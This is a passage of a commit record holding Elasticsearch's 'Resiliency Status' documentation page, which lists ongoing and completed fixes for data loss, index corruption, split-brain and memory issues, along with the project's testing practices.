https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/7bf3ffe73c44f1208d1f7a78b0629eb48836e726[original commit] of a reproduction on master. (STATUS: DONE, v1.2.0)\n* The bug described in {GIT}2488[issue 2488] is caused by an issue in our zen discovery gossip protocol. This specific issue has been fixed, and work has been done to make the algorithm more resilient. (STATUS: DONE, v1.4.0.Beta1)\n\n[float]\n=== Translog Entry Checksum (STATUS: DONE, v1.4.0.Beta1)\n\nEach translog entry in Elasticsearch should have its own checksum, and potentially additional information, so that we can properly detect corrupted translog entries and act accordingly. You can find more detail in issue {GIT}6554[#6554].\n\nTo start, we will begin by adding checksums to the translog to detect corrupt entries. Once this work has been completed, we will add translog entry markers so that corrupt entries can be skipped in the translog if\/when desired.\n\n[float]\n=== Request-Level Memory Circuit Breaker (STATUS: DONE, v1.4.0.Beta1)\n\nWe are in the process of introducing multiple circuit breakers in Elasticsearch, which can \u201cborrow\u201d space from each other in the event that one runs out of memory. This architecture will allow limits for certain parts of memory, but still allow flexibility in the event that another reserve like field data is not being used. This change includes adding a breaker for the BigArrays internal object used for some aggregations. See issue {GIT}6739[#6739] for more details.\n\n[float]\n=== Doc Values (STATUS: DONE, v1.4.0.Beta1)\n\nFielddata is one of the largest consumers of heap memory, and thus one of the primary reasons for running out of memory and causing node instability. Elasticsearch has had the \u201cdoc values\u201d option for a while, which allows you to build these structures at index time so that they live on disk instead of in memory. Up until recently, doc values were significantly slower than in-memory fielddata.\n\nBy benchmarking and profiling both Lucene and Elasticsearch, we identified the bottlenecks and have made a series of improvements to improve the performance of doc values. They are now almost as fast as the in-memory option.\n\nSee {GIT}6967[#6967], {GIT}6908[#6908], {GIT}4548[#4548], {GIT}3829[#3829], {GIT}4518[#4518], {GIT}5669[#5669], {JIRA}5748[LUCENE-5748], {JIRA}5703[LUCENE-5703], {JIRA}5750[LUCENE-5750], {JIRA}5721[LUCENE-5721], {JIRA}5799[LUCENE-5799].\n\n[float]\n=== Index corruption when upgrading Lucene 3.x indices (STATUS: DONE, v1.4.0.Beta1)\n\nUpgrading indices create with Lucene 3.x (Elasticsearch v0.20 and before) to Lucene 4.7 - 4.9 (Elasticsearch 1.1.0 to 1.3.x), could result in index corruption. {JIRA}5907[LUCENE-5907] fixes this issue in Lucene 4.10.\n\n[float]\n=== Improve error handling when deleting files (STATUS: DONE, v1.4.0.Beta1)\n\nLucene uses reference counting to prevent files that are still in use from being deleted. Lucene testing discovered a bug ({JIRA}5919[LUCENE-5919]) when decrementing the ref count on a batch of files. If deleting some of the files resulted in an exception (e.g. due to interference from a virus scanner), the files that had had their ref counts decremented successfully could later have their ref counts deleted again, incorrectly, resulting in files being physically deleted before their time. This is fixed in Lucene 4.10.\n\n[float]\n=== Using Lucene Checksums to verify shards during snapshot\/restore (STATUS:DONE, v1.3.3)\n\nThe snapshot process should verify checksums for each file that is being snapshotted to make sure that created snapshot doesn\u2019t contain corrupted files. If a corrupted file is detected, the snapshot should fail with an error. In order to implement this feature we need to have correct and verifiable checksums stored with segment files, which is only possible for files that were written by the officially supported append-only codecs. See {GIT}7159[#7159].\n\n[float]\n=== Rare compression corruption during shard recovery (STATUS: DONE, v1.3.2)\n\nDuring recovery, the primary shard is copied over the network to become a new replica shard. In rare cases, it was possible for a hash collision to trigger a bug in the compression library that is used to produce corruption in the replica shard. This bug was exposed by the change to validate checksums during recovery. We tracked down the bug in the in compression library and submitted a patch, which was accepted and merged by the upstream project. See {GIT}7210[#7210].\n\n[float]\n=== Safer recovery of replica shards (STATUS: DONE, v1.3.0)\n\nIf a primary shard fails or is closed while a replica is using it for recovery, we need to ensure that the replica is properly failed as well, and allow recovery to start from the new primary. Also check that an active copy of a shard is available on another node before physically removing an inactive shard from disk. {GIT}6825[#6825], {GIT}6645[#6645], {GIT}6995[#6995].\n\n[float]\n=== Using Lucene Checksums to verify shards during recovery (STATUS: DONE, v1.3.0)\n\nElasticsearch can use Lucene checksums to validate files while {GIT}6776[recovering a replica shard from a primary].\n\nThis issue exposed a bug in Elasticsearch\u2019s handling of primary shard failure when having more than 2 replicas, causing the second replica to not be properly unassigned if it is in the middle of recovery. It was fixed with the merge of issue {GIT}6808[#6808].\n\nIn order to verify the checksumming mechanism, we added functionality to our testing infrastructure that can corrupt an arbitrary index file and at any point, such as while it\u2019s traveling over the wire or residing on disk. The tests utilizing this feature expect full or partial recovery from the failure while neither losing data nor spreading the corruption.\n\n[float]\n=== Detect File Corruption (STATUS: DONE, v1.3.0)\n\nWhen a corrupted index can be detected during merging or refresh, Elasticsearch will fail the shard if a checksum failure is detected. You can read the full details in pull request {GIT}6776[#6776].\n\n[float]\n=== Network disconnect events could be lost, causing a zombie node to stay in the cluster state (STATUS: DONE, v1.3.0)\n\nPreviously, there was a very short window in which we could lose a node disconnect event. To prevent this from occurring, we added extra handling of connection errors to our nodes & master fault detection pinging to make sure the node disconnect event is detected. See issue {GIT}6686[#6686].\n\n[float]\n=== Other fixes to Lucene to address resiliency (STATUS: DONE, v1.3.0)\n\n* NativeLock is released if Lock is closed after failing on obtain {JIRA}5738[LUCENE-5738].\n* NRT Reader close can wipe an index it doesn\u2019t own. {JIRA}5574[LUCENE-5574]\n* FSDirectory\u2019s fsync() is lenient, now throws exceptions when errors occur {JIRA}5570[LUCENE-5570]\n* fsync() directory when committing {JIRA}5588[LUCENE-5588]\n\n[float]\n=== Backwards Compatibility Testings (STATUS: DONE, v1.3.0)\n\nSince founding Elasticsearch Inc, we grew our test base from ~1k tests to about 4k in just about over a year. We invested massively into our testing infrastructure, running our tests continuously on different operating systems, bare metal hardware and cloud environments, all while randomizing JVMs and their settings.\n\nYet, backwards compatibility testing was a very manual thing until we released a pretty {GIT}6393[insane bug] with Elasticsearch 1.2. We tried to fix places where the absolute value of a number was negative (a documented behavior of Math.abs(int) in Java) and missed that the fix for this also changed the result of our routing function. No matter how much randomization we applied to the tests, we didn\u2019t catch this particular failure. We always had backwards compatibility tests on our list of things to do, but didn\u2019t have them in place back then.\n\nWe recently tweaked our testing infrastructure to be able to run tests against a hybrid cluster composed of a released version of Elasticsearch and our current stable branch. This test pattern allowed us to mimic typical upgrade scenarios like rolling upgrades, index backwards compatibility and recovering from old to new nodes.\n\nNow, even the simplest test that relies on routing fails against 1.2.0, which is exactly we were aiming for. The test would not have caught the aforementioned {GIT}6393[routing bug] before releasing 1.2.0, but it immediately saved us from {GIT}6660[another problem] in the stable branch.\n\nThe work on our testing infrastructure is more than just issue prevention, it allows us to develop and test upgrade paths, introduce new features and evolve indexing over time. It isn\u2019t enough to introduce more resilient implementations, we also have to ensure that users take advantage of them when they upgrade.\n\nYou can read more about backwards compatibility tests in issue {GIT}6497[#6497].\n\n[float]\n=== Full Translog Writes on all Platforms (STATUS: DONE, v1.2.2 and v1.3.0)\n\nWe have recently received bug reports of transaction log corruption that can occur when indexing very large documents (in the area of 300 KB). Although some Linux users reported this behavior, it appears the problem occurs more frequently when running Windows. We traced the source of the problem to the fact that when serializing documents to the transaction log, the Operating System can actually write only part of the document before returning from the write call. We can now detect this situation and make sure that the entire document is properly written. You can read the full details in pull request {GIT}6576[#6576].\n\n[float]\n=== Lucene Checksums (STATUS: DONE, v1.2.0)\n\nBefore Apache Lucene version 4.8, checksums were not computed on generated index files. The result was that it was difficult to identify when or if a Lucene index got corrupted, whether by hardware failure, JVM bug or for an entirely different reason.\n\nFor an idea of the checksum efforts in progress in Apache Lucene, see issues {JIRA}2446[LUCENE-2446], {JIRA}5580[LUCENE-5580] and {JIRA}5602[LUCENE-5602]. The gist is that Lucene 4.8+ now computes full checksums on all index files and it verifies them when opening metadata or other smaller files as well as other files during merges.\n\n[float]\n=== Detect errors faster by locally failing a shard upon an indexing error (STATUS: DONE, v1.2.0)\n\nPreviously, Elasticsearch notified the master of the shard failure and waited for the master to close the local copy of the shard, thus assigning it to other nodes. This architecture caused delays in failure detection, potentially causing unneeded failures of other incoming requests. In rare cases, such as concurrency racing conditions or certain network partitions configurations, we could lose these failure notifications. We solved this issue by locally failing shards upon indexing errors. See issue {GIT}5847[#5847].\n\n[float]\n=== Snapshot\/Restore API (STATUS: DONE, v1.0.0)\n\nIn Elasticsearch version 1.0, we significantly improved the backup process by introducing the Snapshot\/Restore API. While it was always possible to make backups of Elasticsearch, the Snapshot\/Restore API made the backup process much easier.\n\nThe backup process is incremental, making it very efficient since only files changed since the last backup are copied. Even with this efficiency introduced, each snapshot contains a full picture of the cluster at the moment when backup started. The restore API allows speedy recovery of a full cluster as well as selected indices.\n\nSince that first release in version 1.0, the API has continued to evolve. In version 1.1.0, we added a new snapshot status API that allows users to monitor the snapshot process. In 1.3.0 we added the ability to {GIT}6457[restore indices without their aliases] and in 1.4 we are planning to add the ability to {GIT}6368[restore partial snapshots].\n\nThe Snapshot\/Restore API supports a number of different repository types for storing backups. Currently, it\u2019s possible to make backups to a shared file system, Amazon S3, HDFS, and Azure storage. We are continuing to work on adding other types of storage systems, as well as improving the robustness of the snapshot\/restore process.\n\n[float]\n=== Circuit Breaker: Fielddata (STATUS: DONE, v1.0.0)\n\nCurrently, the http:\/\/www.elasticsearch.org\/guide\/en\/elasticsearch\/reference\/current\/index-modules-fielddata.html[circuit breaker] protects against loading too much field data by estimating how much memory the field data will take to load, then aborting the request if the memory requirements are too high. This feature was added in Elasticsearch version 1.0.0.\n\n[float]\n=== Use of Paginated Data Structures to Ease Garbage Collection (STATUS: DONE, v1.0.0 & v1.2.0)\n\nElasticsearch has moved from an object-based cache to a page-based cache recycler as described in issue {GIT}4557[#4557]. This change makes garbage collection easier by limiting fragmentation, since all pages have the same size and are recycled. It also allows managing the size of the cache not based on the number of objects it contains, but on the memory that it uses.\n\nThese pages are used for two main purposes: implementing higher level data structures such as hash tables that are used internally by aggregations to eg. map terms to counts, as well as reusing memory in the translog\/transport layer as detailed in issue {GIT}5691[#5691].\n\n[float]\n=== Dedicated Master Nodes Resiliency (STATUS: DONE, v1.0.0)\n\nIn order to run a more resilient cluster, we recommend running dedicated master nodes to ensure master nodes are not affected by resources consumed by data nodes. We also have made master nodes more resilient to heavy resource usage, mainly associated with large clusters \/ cluster states.\n\nThese changes include:\n\n* Improve the balancing algorithm to execute faster across large clusters \/ many indices. (See issue {GIT}4458[#4458] and {GIT}4459[#4459])\n* Improve cluster state publishing to not create an additional network buffer per node. (More in https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/a9e259d438c3cb1d3bef757db2d2a91cf85be609[this commit].)\n* Improve master handling of large scale mapping updates from data nodes by batching them into a single cluster event. (See issue {GIT}4373[#4373].)\n* Add an ack mechanism where next phase cluster updates are processed only when nodes acknowledged they received the previous cluster state. (See issues {GIT}3736[#3736], {GIT}3786[#3786], {GIT}4114[#4114], {GIT}4169[#4169], {GIT}4228[#4228] and {GIT}4421[#4421], which also include enhancements to the ack mechanism implementation.)\n\n[float]\n=== Multi Data Paths May Falsely Report Corrupt Index (STATUS: DONE, v1.0.0)\n\nWhen using multiple data paths, an index could be falsely reported as corrupted. This has been fixed with pull request {GIT}4674[#4674].\n\n[float]\n=== Randomized Testing (STATUS: DONE, v1.0.0)\n\nIn order to best validate for resiliency in Elasticsearch, we rewrote the Elasticsearch test infrastructure to introduce the concept of http:\/\/berlinbuzzwords.de\/sites\/berlinbuzzwords.de\/files\/media\/documents\/dawidweiss-randomizedtesting-pub.pdf[randomized testing]. Randomized testing allows us to easily enhance the Elasticsearch testing infrastructure with predictably irrational conditions, making the resulting code base more resilient.\n\nEach of our integration tests runs against a cluster with a random number of nodes, and indices have a random number of shards and replicas. Merge settings change for every run, indexing is done in serial or async fashion or even wrapped in a bulk operation and thread pool sizes vary to ensure that we don\u2019t produce a deadlock no matter what happens. The list of places we use this randomization infrastructure is long, and growing every day, and has saved us headaches several times before we shipped a particular feature.\n\nAt Elasticsearch, we live the philosophy that we can miss a bug once, but never a second time. We make our tests more evil as you go, introducing randomness in all the areas where we discovered bugs. We figure if our tests don\u2019t fail, weare not trying hard enough! If you are interested in how we have evolved our test infrastructure over time check out https:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Atest[issues labeled with ``test'' on GitHub].\n\n[float]\n=== Lucene Loses Data On File Descriptors Failure (STATUS: DONE, v0.90.0)\n\nWhen a process runs out of file descriptors, Lucene can causes an index to be completely deleted. This issue was fixed in Lucene ({JIRA}4870[version 4.2.1]) and fixed in an early version of Elasticsearch. See issue {GIT}2812[#2812].\n\n","old_contents":"= Resiliency Status\n\n:JIRA: https:\/\/issues.apache.org\/jira\/browse\/LUCENE-\n:GIT: https:\/\/github.com\/elasticsearch\/elasticsearch\/issues\/\n\n== Overview\n\nThe team at Elasticsearch is committed to continuously improving both\nElasticsearch and Apache Lucene to protect your data. As with any distributed\nsystem, Elasticsearch is complex and has many moving parts, each of which can\nencounter edge cases that require proper handling. Our resiliency project is\nan ongoing effort to find and fix these edge cases. If you want to keep up\nwith all this project on GitHub, see our issues list under the tag\nhttps:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Aresiliency[resiliency].\n\nWhile GitHub is great for sharing our work, it can be difficult to get an\noverview of the current state of affairs and the previous work that has been\ndone from an issues list. This page provides an overview of all the\nresiliency-related issues that we are aware of, improvements that have already\nbeen made and current in-progress work. We\u2019ve also listed some historical\nimprovements throughout this page to provide the full context.\n\nIf you\u2019re interested in more on how we approach ensuring resiliency in\nElasticsearch, you may be interested in Igor Motov\u2019s recent talk\nhttp:\/\/www.elasticsearch.org\/videos\/improving-elasticsearch-resiliency\/[Improving Elasticsearch Resiliency].\n\nYou may also be interested in our blog post\nhttp:\/\/www.elasticsearch.org\/blog\/resiliency-elasticsearch\/[Resiliency in Elasticsearch],\nwhich details our thought processes when addressing resiliency in both\nElasticsearch and the work our developers do upstream in Apache Lucene.\n\n== Data Store Recommendations\n\nSome customers use Elasticsearch as a primary datastore, some set-up\ncomprehensive back-up solutions using features such as our Snapshot and\nRestore, while others use Elasticsearch in conjunction with a data storage\nsystem like Hadoop or even flat files. Elasticsearch can be used for so many\ndifferent use cases which is why we have created this page to make sure you\nare fully informed when you are architecting your system.\n\n== Work in Progress\n\n[float]\n=== Known Unknowns (STATUS: ONGOING)\n\nWe consider this topic to be the most important in our quest for\nresiliency. We put a tremendous amount of effort into testing\nElasticsearch to simulate failures and randomize configuration to\nproduce extreme conditions. In addition, our users are an important\nsource of information on unexpected edge cases and your bug reports\nhelp us make fixes that ensure that our system continues to be\nresilient.\n\nIf you encounter an issue, https:\/\/github.com\/elasticsearch\/elasticsearch\/issues[please report it]!\n\nWe are committed to tracking down and fixing all the issues that are posted.\n\n[float]\n=== Loss of documents during network partition (STATUS: ONGOING)\n\nIf a network partition separates a node from the master, there is some window of time before the node detects it. The length of the window is dependent on the type of the partition. This window is extremely small if a socket is broken. More adversarial partitions, for example, silently dropping requests without breaking the socket can take longer (up to 3x30s using current defaults).\n\nIf the node hosts a primary shard at the moment of partition, and ends up being isolated from the cluster (which could have resulted in {GIT}2488[split-brain] before), some documents that are being indexed into the primary may be lost if they fail to reach one of the allocated replicas (due to the partition) and that replica is later promoted to primary by the master. {GIT}7572[#7572]\n\nA test to replicate this condition was added in {GIT}7493[#7493].\n\n[float]\n=== Prevent use of known-bad Java versions (STATUS: ONGOING)\n\nCertain versions of the JVM are known to have bugs which can cause index corruption. {GIT}7580[#7580] prevents Elasticsearch startup if known bad versions are in use.\n\n[float]\n=== Lucene checksums phase 2 (STATUS:ONGOING)\n\nWhen Lucene opens a segment for reading, it validates the checksum on the smaller segment files -- those which it reads entirely into memory -- but not the large files like term frequencies and positions, as this would be very expensive. During merges, term vectors and stored fields are validated, as long the segments being merged come from the same version of Lucene. Checksumming for term vectors and stored fields is important because merging consists of performing optimized byte copies. Term frequencies, term positions, payloads, doc values, and norms are currently not checked during merges, although Lucene provides the option to do so. These files are less prone to silent corruption as they are actively decoded during merge, and so are more likely to throw exceptions if there is any corruption.\n\nThere are a few ongoing efforts to improve coverage:\n\n* {GIT}7360[#7360] validates checksums on all segment files during merges. (STATUS: DONE, fixed in 1.4.0.Beta1)\n* {JIRA}5842[LUCENE-5842] validates the structure of the checksum footer of the postings lists, doc values, stored fields and term vectors when opening a new segment, to ensure that these files have not been truncated. (STATUS: DONE, Fixed in Lucene 4.10 and 1.4.0.Beta1)\n* {JIRA}5894[LUCENE-5894] lays the groundwork for extending more efficient checksum validation to all files during optimized bulk merges, if possible. (STATUS: ONGOING, Fixed in Lucene 5.0)\n* {GIT}7586[#7586] adds checksums for cluster and index state files. (STATUS: ONGOING, fixed in 1.5.0)\n\n[float]\n=== Add per-segment and per-commit ID to help replication (STATUS: ONGOING)\n\n{JIRA}5895[LUCENE-5895] adds a unique ID for each segment and each commit point. File-based replication (as performed by snapshot\/restore) can use this ID to know whether the segment\/commit on the source and destination machines are the same. Fixed in Lucene 5.0.\n\n[float]\n=== Improving Zen Discovery (STATUS: ONGOING)\n\nRecovery from failure is a complicated process, especially in an asynchronous distributed system like Elasticsearch. With several processes happening in parallel, it is important to ensure that recovery proceeds swiftly and safely. While fixing the {GIT}2488[split-brain issue] we have been hunting down corner cases that were not handled optimally, adding tests to demonstrate the issues, and working on fixes:\n\n* Faster & better detection of master & node failures, including not trying to reconnect upon disconnect, fail on disconnect error on ping, verify cluster names in pings. Previously, Elasticsearch had to wait a bit for the node to complete the process required to join the cluster. Recent changes guarantee that a node has fully joined the cluster before we start the fault detection process. Therefore we can do an immediate check causing faster detection of errors and validation of cluster state after a minimum master node breach. {GIT}6706[#6706], {GIT}7399[#7399] (STATUS: DONE, v1.4.0.Beta1)\n* Broaden Unicast pinging when master fails: When a node loses it\u2019s current master it will start pinging to find a new one. Previously, when using unicast based pinging, the node would ping a set of predefined nodes asking them whether the master had really disappeared or whether there was a network hiccup. Now, we ping all nodes in the cluster to increase coverage. In the case that all unicast hosts are disconnected from the current master during a network failure, this improvement is essential to allow the cluster to reform once the partition is healed. {GIT}7336[#7336] (STATUS: DONE, v1.4.0.Beta1)\n* After joining a cluster, validate that the join was successful and that the master has been set in the local cluster state. {GIT}6969[#6969]. (STATUS: DONE, v1.4.0.Beta1)\n* Write additional tests that use the test infrastructure to verify proper behavior during network disconnections and garbage collections. {GIT}7082[#7082] (STATUS: ONGOING)\n* Make write calls return the number of total\/successful\/missing shards in the same way that we do in search, which ensures transparency in the consistency of write operations. {GIT}7572[#7572]. (STATUS: ONGOING)\n\n[float]\n=== Validate quorum before accepting a write request (STATUS: ONGOING)\n\nToday, when a node holding a primary shard receives an index request, it checks the local cluster state to see whether a quorum of shards is available before it accepts the request. However, it can take some time before an unresponsive node is removed from the cluster state. We are adding an optional live check, where the primary node tries to contact its replicas to confirm that they are still responding before accepting any changes. See {GIT}6937[#6937].\n\nWhile the work is going on, we tightened the current checks by bringing them closer to the index code. See {GIT}7873[#7873] (STATUS: DONE, fixed in 1.4.0)\n\n[float]\n=== Jepsen Test Failures (STATUS: ONGOING)\n\nWe have increased our test coverage to include scenarios tested by Jepsen. We make heavy use of randomization to expand on the scenarios that can be tested and to introduce new error conditions. You can follow the work on the master branch of the https:\/\/github.com\/elasticsearch\/elasticsearch\/blob\/master\/src\/test\/java\/org\/elasticsearch\/discovery\/DiscoveryWithServiceDisruptions.java[`DiscoveryWithServiceDisruptions` class], where we will add more tests as time progresses.\n\n[float]\n=== Document guarantees and handling of failure (STATUS: ONGOING)\n\nThis status page is a start, but we can do a better job of explicitly documenting the processes at work in Elasticsearch, and what happens in the case of each type of failure. The plan is to have a test case that validates each behavior under simulated conditions. Every test will document the expected results, the associated test code and an explicit PASS or FAIL status for each simulated case.\n\n\n[float]\n=== Add a minimum weight to filter cache entries (STATUS: ONGOING)\n\nCommonly used filters are cached in Elasticsearch. That cache is limited in size (10% of node's memory by default) and is being evicted based on a least recently used policy. The amount of memory used by the cache depends on two primary components - the values it stores and the keys associated with them. Calculating the memory footprint of the values is easy enough but the keys accounting is trickier to achieve as they are, by default, raw Lucene objects. This is largely not a problem as the keys are dominated by the values. However, recent optimizations in Lucene have changed the balance causing the filter cache to grow beyond it's size.\n\nWhile we are working on a longer term solution, we introduced a minimum weight of 1k for each cache entry. This puts an effective limit on the number of entries in the cache. See {GIT}8304[#8304] (STATUS: DONE, fixed in 1.4.0)\n\n== Completed\n\n[float]\n=== Don't allow unsupported codecs (STATUS: DONE, v1.4.0.Beta1)\n\nLucene 4 added a number of alternative codecs for experimentation purposes, and Elasticsearch exposed the ability to change codecs. Since then, Lucene has settled on the best choice of codec and provides backwards compatibility only for the default codec. {GIT}7566[#7566] removes the ability to set alternate codecs.\n\n[float]\n=== Use checksums to identify entire segments (STATUS: DONE, v1.4.0.Beta1)\n\nA hash collision makes it possible for two different files to have the same length and the same checksum. Instead, a segment's identity should rely on checksums from all of the files in a single segment, which greatly reduces the chance of a collision. This change has been merged ({GIT}7351[#7351]).\n\n[float]\n=== Fix ''Split Brain can occur even with minimum_master_nodes'' (STATUS: DONE, v1.4.0.Beta1)\n\nEven when minimum master nodes is set, split brain can still occur under certain conditions, e.g. disconnection between master eligible nodes, which can lead to data loss. The scenario is described in detail in {GIT}2488[issue 2488]:\n\n* Introduce a new testing infrastructure to simulate different types of node disconnections, including loss of network connection, lost messages, message delays, etc. See {GIT}5631[MockTransportService] support and {GIT}6505[service disruption] for more details. (STATUS: DONE, v1.4.0.Beta1).\n* Added tests that simulated the bug described in issue 2488. You can take a look at the https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/7bf3ffe73c44f1208d1f7a78b0629eb48836e726[original commit] of a reproduction on master. (STATUS: DONE, v1.2.0)\n* The bug described in {GIT}2488[issue 2488] is caused by an issue in our zen discovery gossip protocol. This specific issue has been fixed, and work has been done to make the algorithm more resilient. (STATUS: DONE, v1.4.0.Beta1)\n\n[float]\n=== Translog Entry Checksum (STATUS: DONE, v1.4.0.Beta1)\n\nEach translog entry in Elasticsearch should have its own checksum, and potentially additional information, so that we can properly detect corrupted translog entries and act accordingly. You can find more detail in issue {GIT}6554[#6554].\n\nTo start, we will begin by adding checksums to the translog to detect corrupt entries. Once this work has been completed, we will add translog entry markers so that corrupt entries can be skipped in the translog if\/when desired.\n\n[float]\n=== Request-Level Memory Circuit Breaker (STATUS: DONE, v1.4.0.Beta1)\n\nWe are in the process of introducing multiple circuit breakers in Elasticsearch, which can \u201cborrow\u201d space from each other in the event that one runs out of memory. This architecture will allow limits for certain parts of memory, but still allow flexibility in the event that another reserve like field data is not being used. This change includes adding a breaker for the BigArrays internal object used for some aggregations. See issue {GIT}6739[#6739] for more details.\n\n[float]\n=== Doc Values (STATUS: DONE, v1.4.0.Beta1)\n\nFielddata is one of the largest consumers of heap memory, and thus one of the primary reasons for running out of memory and causing node instability. Elasticsearch has had the \u201cdoc values\u201d option for a while, which allows you to build these structures at index time so that they live on disk instead of in memory. Up until recently, doc values were significantly slower than in-memory fielddata.\n\nBy benchmarking and profiling both Lucene and Elasticsearch, we identified the bottlenecks and have made a series of improvements to improve the performance of doc values. They are now almost as fast as the in-memory option.\n\nSee {GIT}6967[#6967], {GIT}6908[#6908], {GIT}4548[#4548], {GIT}3829[#3829], {GIT}4518[#4518], {GIT}5669[#5669], {JIRA}5748[LUCENE-5748], {JIRA}5703[LUCENE-5703], {JIRA}5750[LUCENE-5750], {JIRA}5721[LUCENE-5721], {JIRA}5799[LUCENE-5799].\n\n[float]\n=== Index corruption when upgrading Lucene 3.x indices (STATUS: DONE, v1.4.0.Beta1)\n\nUpgrading indices create with Lucene 3.x (Elasticsearch v0.20 and before) to Lucene 4.7 - 4.9 (Elasticsearch 1.1.0 to 1.3.x), could result in index corruption. {JIRA}5907[LUCENE-5907] fixes this issue in Lucene 4.10.\n\n[float]\n=== Improve error handling when deleting files (STATUS: DONE, v1.4.0.Beta1)\n\nLucene uses reference counting to prevent files that are still in use from being deleted. Lucene testing discovered a bug ({JIRA}5919[LUCENE-5919]) when decrementing the ref count on a batch of files. If deleting some of the files resulted in an exception (e.g. due to interference from a virus scanner), the files that had had their ref counts decremented successfully could later have their ref counts deleted again, incorrectly, resulting in files being physically deleted before their time. This is fixed in Lucene 4.10.\n\n[float]\n=== Using Lucene Checksums to verify shards during snapshot\/restore (STATUS:DONE, v1.3.3)\n\nThe snapshot process should verify checksums for each file that is being snapshotted to make sure that created snapshot doesn\u2019t contain corrupted files. If a corrupted file is detected, the snapshot should fail with an error. In order to implement this feature we need to have correct and verifiable checksums stored with segment files, which is only possible for files that were written by the officially supported append-only codecs. See {GIT}7159[#7159].\n\n[float]\n=== Rare compression corruption during shard recovery (STATUS: DONE, v1.3.2)\n\nDuring recovery, the primary shard is copied over the network to become a new replica shard. In rare cases, it was possible for a hash collision to trigger a bug in the compression library that is used to produce corruption in the replica shard. This bug was exposed by the change to validate checksums during recovery. We tracked down the bug in the in compression library and submitted a patch, which was accepted and merged by the upstream project. See {GIT}7210[#7210].\n\n[float]\n=== Safer recovery of replica shards (STATUS: DONE, v1.3.0)\n\nIf a primary shard fails or is closed while a replica is using it for recovery, we need to ensure that the replica is properly failed as well, and allow recovery to start from the new primary. Also check that an active copy of a shard is available on another node before physically removing an inactive shard from disk. {GIT}6825[#6825], {GIT}6645[#6645], {GIT}6995[#6995].\n\n[float]\n=== Using Lucene Checksums to verify shards during recovery (STATUS: DONE, v1.3.0)\n\nElasticsearch can use Lucene checksums to validate files while {GIT}6776[recovering a replica shard from a primary].\n\nThis issue exposed a bug in Elasticsearch\u2019s handling of primary shard failure when having more than 2 replicas, causing the second replica to not be properly unassigned if it is in the middle of recovery. It was fixed with the merge of issue {GIT}6808[#6808].\n\nIn order to verify the checksumming mechanism, we added functionality to our testing infrastructure that can corrupt an arbitrary index file and at any point, such as while it\u2019s traveling over the wire or residing on disk. The tests utilizing this feature expect full or partial recovery from the failure while neither losing data nor spreading the corruption.\n\n[float]\n=== Detect File Corruption (STATUS: DONE, v1.3.0)\n\nWhen a corrupted index can be detected during merging or refresh, Elasticsearch will fail the shard if a checksum failure is detected. You can read the full details in pull request {GIT}6776[#6776].\n\n[float]\n=== Network disconnect events could be lost, causing a zombie node to stay in the cluster state (STATUS: DONE, v1.3.0)\n\nPreviously, there was a very short window in which we could lose a node disconnect event. To prevent this from occurring, we added extra handling of connection errors to our nodes & master fault detection pinging to make sure the node disconnect event is detected. See issue {GIT}6686[#6686].\n\n[float]\n=== Other fixes to Lucene to address resiliency (STATUS: DONE, v1.3.0)\n\n* NativeLock is released if Lock is closed after failing on obtain {JIRA}5738[LUCENE-5738].\n* NRT Reader close can wipe an index it doesn\u2019t own. {JIRA}5574[LUCENE-5574]\n* FSDirectory\u2019s fsync() is lenient, now throws exceptions when errors occur {JIRA}5570[LUCENE-5570]\n* fsync() directory when committing {JIRA}5588[LUCENE-5588]\n\n[float]\n=== Backwards Compatibility Testings (STATUS: DONE, v1.3.0)\n\nSince founding Elasticsearch Inc, we grew our test base from ~1k tests to about 4k in just about over a year. We invested massively into our testing infrastructure, running our tests continuously on different operating systems, bare metal hardware and cloud environments, all while randomizing JVMs and their settings.\n\nYet, backwards compatibility testing was a very manual thing until we released a pretty {GIT}6393[insane bug] with Elasticsearch 1.2. We tried to fix places where the absolute value of a number was negative (a documented behavior of Math.abs(int) in Java) and missed that the fix for this also changed the result of our routing function. No matter how much randomization we applied to the tests, we didn\u2019t catch this particular failure. We always had backwards compatibility tests on our list of things to do, but didn\u2019t have them in place back then.\n\nWe recently tweaked our testing infrastructure to be able to run tests against a hybrid cluster composed of a released version of Elasticsearch and our current stable branch. This test pattern allowed us to mimic typical upgrade scenarios like rolling upgrades, index backwards compatibility and recovering from old to new nodes.\n\nNow, even the simplest test that relies on routing fails against 1.2.0, which is exactly we were aiming for. The test would not have caught the aforementioned {GIT}6393[routing bug] before releasing 1.2.0, but it immediately saved us from {GIT}6660[another problem] in the stable branch.\n\nThe work on our testing infrastructure is more than just issue prevention, it allows us to develop and test upgrade paths, introduce new features and evolve indexing over time. It isn\u2019t enough to introduce more resilient implementations, we also have to ensure that users take advantage of them when they upgrade.\n\nYou can read more about backwards compatibility tests in issue {GIT}6497[#6497].\n\n[float]\n=== Full Translog Writes on all Platforms (STATUS: DONE, v1.2.2 and v1.3.0)\n\nWe have recently received bug reports of transaction log corruption that can occur when indexing very large documents (in the area of 300 KB). Although some Linux users reported this behavior, it appears the problem occurs more frequently when running Windows. We traced the source of the problem to the fact that when serializing documents to the transaction log, the Operating System can actually write only part of the document before returning from the write call. We can now detect this situation and make sure that the entire document is properly written. You can read the full details in pull request {GIT}6576[#6576].\n\n[float]\n=== Lucene Checksums (STATUS: DONE, v1.2.0)\n\nBefore Apache Lucene version 4.8, checksums were not computed on generated index files. The result was that it was difficult to identify when or if a Lucene index got corrupted, whether by hardware failure, JVM bug or for an entirely different reason.\n\nFor an idea of the checksum efforts in progress in Apache Lucene, see issues {JIRA}2446[LUCENE-2446], {JIRA}5580[LUCENE-5580] and {JIRA}5602[LUCENE-5602]. The gist is that Lucene 4.8+ now computes full checksums on all index files and it verifies them when opening metadata or other smaller files as well as other files during merges.\n\n[float]\n=== Detect errors faster by locally failing a shard upon an indexing error (STATUS: DONE, v1.2.0)\n\nPreviously, Elasticsearch notified the master of the shard failure and waited for the master to close the local copy of the shard, thus assigning it to other nodes. This architecture caused delays in failure detection, potentially causing unneeded failures of other incoming requests. In rare cases, such as concurrency racing conditions or certain network partitions configurations, we could lose these failure notifications. We solved this issue by locally failing shards upon indexing errors. See issue {GIT}5847[#5847].\n\n[float]\n=== Snapshot\/Restore API (STATUS: DONE, v1.0.0)\n\nIn Elasticsearch version 1.0, we significantly improved the backup process by introducing the Snapshot\/Restore API. While it was always possible to make backups of Elasticsearch, the Snapshot\/Restore API made the backup process much easier.\n\nThe backup process is 